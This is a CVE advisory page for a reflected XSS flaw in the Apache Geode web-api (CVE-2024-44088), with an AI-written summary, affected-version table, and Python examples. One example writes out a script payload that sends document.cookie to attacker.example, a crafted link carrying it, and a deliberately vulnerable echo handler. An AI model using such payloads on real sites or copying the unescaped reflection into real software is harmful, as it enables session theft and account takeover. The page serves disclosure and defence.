Apache Geode: Reflected XSS
Description
Cross-site scripting (XSS) vulnerability in the Apache Geode web-api (REST). An attacker who tricks a logged-in user into clicking a specially crafted link can execute script in the page returned to that user, which could lead to theft of the user's session information and even account takeover.
This issue affects Apache Geode: all versions prior to 1.15.2
Users are recommended to upgrade to version 1.15.2, which fixes the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A reflected XSS vulnerability in Apache Geode's web-api (REST) lets an attacker who tricks a logged-in user into opening a crafted link run script in that user's browser, leading to session theft and potential account takeover.
Vulnerability
Overview
CVE-2024-44088 is a reflected cross-site scripting (XSS) vulnerability in the Apache Geode web-api (REST) component. The endpoint reflects user-supplied request input into its HTTP response without encoding it for the HTML context it lands in, so an attacker-controlled value becomes script when a browser renders the response [2][3].
Exploitation
Prerequisites
To exploit this vulnerability, an attacker must trick a logged-in user into clicking a specially crafted link. The attacker needs no credentials of their own; the victim, however, must have an active session with the Apache Geode web-api, because the reflected script runs in that session's context. The attack is performed over the network and requires user interaction [2][3].
Impact
Successful exploitation lets the attacker execute arbitrary JavaScript in the victim's browser, in the origin that served the Geode web-api response. The script can read the session cookie if it is not marked HttpOnly, enabling session hijacking and potential account takeover; even when the cookie is protected, the script can still issue REST requests that carry the victim's session, performing actions on the victim's behalf [2][3].
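The reflection described in the Overview and the crafted link from Prerequisites, as an added example that is not code from this page or from Apache Geode: a hypothetical error handler that echoes a `region` query parameter, first verbatim into a text/html body (the vulnerable shape), then with HTML output encoding and `X-Content-Type-Options: nosniff`. The host, path, parameter name and payload are all assumptions constructed for illustration, not the real geode-web-api route.

```python
"""Reflected XSS in a REST endpoint: vulnerable reflection next to the hardened form.

Added example, not code from Apache Geode's geode-web-api; the route, the
`region` parameter and the response bodies are constructed for illustration.
"""
import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed payload: ships document.cookie to an attacker-controlled host.
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'

# Constructed "specially-crafted link". Host and path are assumptions; the payload
# is percent-encoded so every byte survives the trip through the URL.
CRAFTED_LINK = ("http://geode.example:7070/geode/v1/regions?region="
                + quote(PAYLOAD, safe=""))


def _region_param(url: str) -> str:
    """Extract the reflected query parameter, URL-decoded as a server would see it."""
    return parse_qs(urlparse(url).query).get("region", [""])[0]


def handle_vulnerable(url: str) -> dict:
    """Hypothetical error handler that echoes the parameter into an HTML body verbatim.
    Served as text/html, so the browser parses the reflected <script> and runs it."""
    region = _region_param(url)
    return {
        "status": 404,
        "headers": {"Content-Type": "text/html"},
        "body": f"<html><body>Region '{region}' not found</body></html>",
    }


def handle_hardened(url: str) -> dict:
    """Same handler with output encoding: html.escape(quote=True) neutralises
    <, >, &, " and ' for the HTML element context the value lands in, and
    nosniff stops browsers from second-guessing the declared content type."""
    region = html.escape(_region_param(url), quote=True)
    return {
        "status": 404,
        "headers": {
            "Content-Type": "text/html; charset=utf-8",
            "X-Content-Type-Options": "nosniff",
        },
        "body": f"<html><body>Region '{region}' not found</body></html>",
    }


def renders_as_script(response: dict, payload: str) -> bool:
    """Would a browser execute `payload` from this response? Both conditions are
    needed: the bytes must come back verbatim, and the response must be parsed as HTML."""
    content_type = response["headers"].get("Content-Type", "")
    return content_type.startswith("text/html") and payload in response["body"]


if __name__ == "__main__":
    for name, handler in (("vulnerable", handle_vulnerable), ("hardened", handle_hardened)):
        resp = handler(CRAFTED_LINK)
        print(f"{name}: executes={renders_as_script(resp, PAYLOAD)}")
        print("  ", resp["body"])
```

The check in `renders_as_script` is deliberately two-sided: a REST endpoint that answers `application/json` with `nosniff` does not become exploitable merely because a parameter is echoed, and an HTML page does not become safe merely because the word "script" is filtered. Output encoding for the context the value lands in is the fix; the content-type and nosniff headers are defence in depth.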
Mitigation
The vulnerability affects all versions of Apache Geode prior to 1.15.2. Users are strongly recommended to upgrade to version 1.15.2, which contains the fix. No workarounds have been provided by the vendor [2][3].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.apache.geode:geode-web-api (Maven) | >= 1.1.0, < 1.15.2 | 1.15.2 |
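A check against the range in the table, as an added example that is not part of the advisory or of Apache Geode: it scans `mvn dependency:list` style lines for the geode-web-api artifact and classifies each version against >= 1.1.0, < 1.15.2. The dependency lines are constructed sample input; treating `-SNAPSHOT` and other qualifiers as pre-release (so 1.15.2-SNAPSHOT still counts as unfixed) is the example's own assumption, and the six-field classifier form of Maven's output is not handled.

```python
"""Flag builds of geode-web-api inside the advisory's affected range.

Added example, not part of the advisory or of Apache Geode. The dependency
lines below are constructed in the shape `mvn dependency:list` prints; in
practice pipe the real output in. Range boundaries come from the GHSA table.
"""
import re
from collections.abc import Iterable

ARTIFACT = "org.apache.geode:geode-web-api"
AFFECTED_FROM = "1.1.0"   # inclusive lower bound, per the GitHub Security Advisory
PATCHED = "1.15.2"        # first fixed release, exclusive upper bound

# Maven dependency:list lines look like "[INFO]    group:artifact:type:version:scope".
# Entries with a classifier (six fields) are not handled by this regex.
_DEP_LINE = re.compile(
    r"(?P<ga>[\w.\-]+:[\w.\-]+):(?P<type>\w+):(?P<version>[^:\s]+):(?P<scope>\w+)"
)


def version_key(v: str):
    """Comparable key for a Maven-style version. Numeric parts compare numerically;
    a qualifier such as -SNAPSHOT or -RC1 ranks *before* the bare release, so
    1.15.2-SNAPSHOT sorts below 1.15.2 and is still treated as unfixed (assumption)."""
    base, _, qualifier = v.partition("-")
    nums = tuple(int(p) if p.isdigit() else 0 for p in base.split("."))
    return (nums, 0 if qualifier else 1)


def classify(version: str) -> str:
    """'affected' inside [1.1.0, 1.15.2), 'patched' at or above 1.15.2,
    'below-advisory-range' under the GHSA lower bound."""
    key = version_key(version)
    if key < version_key(AFFECTED_FROM):
        return "below-advisory-range"
    if key < version_key(PATCHED):
        return "affected"
    return "patched"


def scan_dependency_list(lines: Iterable[str]) -> list:
    """Return (version, classification) for every geode-web-api entry found."""
    findings = []
    for line in lines:
        m = _DEP_LINE.search(line)
        if m and m.group("ga") == ARTIFACT:
            findings.append((m.group("version"), classify(m.group("version"))))
    return findings


# Constructed sample output; only the geode-web-api lines matter to the scan.
SAMPLE_DEPENDENCY_LIST = """\
[INFO]    org.apache.geode:geode-core:jar:1.15.1:compile
[INFO]    org.apache.geode:geode-web-api:war:1.15.1:compile
[INFO]    org.apache.geode:geode-web-api:war:1.15.2-SNAPSHOT:compile
[INFO]    org.apache.geode:geode-web-api:war:1.15.2:compile
[INFO]    org.apache.geode:geode-web-api:war:1.0.0:compile
""".splitlines()

if __name__ == "__main__":
    for version, verdict in scan_dependency_list(SAMPLE_DEPENDENCY_LIST):
        print(f"{ARTIFACT}:{version} -> {verdict}")
```

Note that the advisory text says "all versions prior to 1.15.2" while the GHSA table starts the range at 1.1.0; the example reports the sub-1.1.0 case separately rather than calling it safe.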
Affected products
- Apache Software Foundation / Apache Geode (affected range starts at 1.1.0)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] github.com/advisories/GHSA-w595-4975-gm3h (GitHub Security Advisory)
- [2] lists.apache.org/thread/161r34nokmcc0w74mnf04lskgb8g1d3g (vendor advisory, Apache mailing list)
- [3] nvd.nist.gov/vuln/detail/CVE-2024-44088 (NVD)
- [4] www.openwall.com/lists/oss-security/2025/10/14/5 (oss-security)
News mentions
No linked articles in our index yet.